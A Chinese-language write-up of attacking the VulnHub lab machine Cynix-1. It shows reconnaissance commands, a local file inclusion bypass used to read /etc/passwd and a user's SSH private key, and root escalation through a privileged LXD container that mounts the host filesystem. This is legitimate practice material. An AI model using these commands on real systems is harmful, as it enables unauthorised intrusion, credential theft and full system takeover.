下载靶机
地址:https://www.vulnhub.com/entry/cynix-1,394/
问题阐述
使用virtualbox,kali和靶机均使用桥接网络
kali:172.20.10.10 靶机:172.20.10.14
打靶目标
获取到root权限
打靶过程
信息搜集
nmap主机探活,做端口扫描
nmap -v -sP 172.20.10.1/24
nmap -sV -sC 172.20.10.14 -p 1-10000
gobuster 扫描目录
gobuster dir -u http://172.20.10.14 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
漏洞利用
直接访问查看,发现有一个留言板,burpsuite抓包,发现跳转cnayoubypassme.php
访问http://172.20.10.14/lavalamp/canyoubypassme.php ,查看网页源代码,发现网页有一个框
再三查看,发现一个透明度为0的地方,直接改为1.0,此时显示如下
还有一个问题,此界面路径为/lavalamp/canyoubypassme.php,响应路径也为lavalamp/canyoubypassme.php,盲猜一手文件包含
随便输入一个数字,出现如下界面
直接抓包,本地文件读取漏洞,直接读取/etc/passwd 文件失败,但是再路径前随便加个字符串就绕过了
通过/etc/passwd可以看到系统中还有一个用户ford,尝试读取用户密钥,成功读取到
直接复制密钥到本地,使用ssh登录,前面做端口扫描的时候有扫到ssh端口6688
ssh -i id_rsa ford@172.20.10.14 -p 6688
这里有一个flag
权限提升
介绍:
LXC是Linux容器的缩写,Linux容器是一种操作系统,用于通过单个Linux内核在受控主机上虚拟运行多个Linux系统。
LXC与内核的cgroup捆绑在一起,为进程和网络空间提供功能,而不是创建一个完整的虚拟机,并为应用程序提供一个隔离的环境。LXC代表Linux容器,它是一种用于操作系统虚拟化的工具。通过使用LXC,可以在虚拟环境中而不是在物理系统中操作任何软件或应用程序。虚拟环境功能使LXC更加安全,成本也更低。LXC很容易操作,因为它带有控制组【Control groups Cgroups】功能。
LXD代表Linux Daemon,它是一个扩展,主要用于指导LXC。它用于向LXC提供新的属性和功能,以便以更有效的方式使用LXC。LXD和LXC之间的通信是通过使用内置库完成的,liblxc就是这样一个库。
lxd 提权
lxc image list
kali攻击机上下载制作lxc提权镜像
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
本地开启http服务
python3 -m http.server 8000
靶机下载下来
wget http://172.20.10.10:8000/alpine-v3.18-x86_64-20230619_1213.tar.gz
靶机上导入lxc镜像并查看
lxc image import ./alpine-v3.18-x86_64-20230619_1213.tar.gz --alias hack
lxc image list
靶机上创建lxc实例并配置后启动
lxc init hack hack -c security.privileged=true
lxc config device add hack hack disk source=/ path=/mnt/root recursive=true
//在/mnt/root 下挂载整个磁盘
lxc start hack
最后一步
lxc exec hack /bin/sh //与容器交换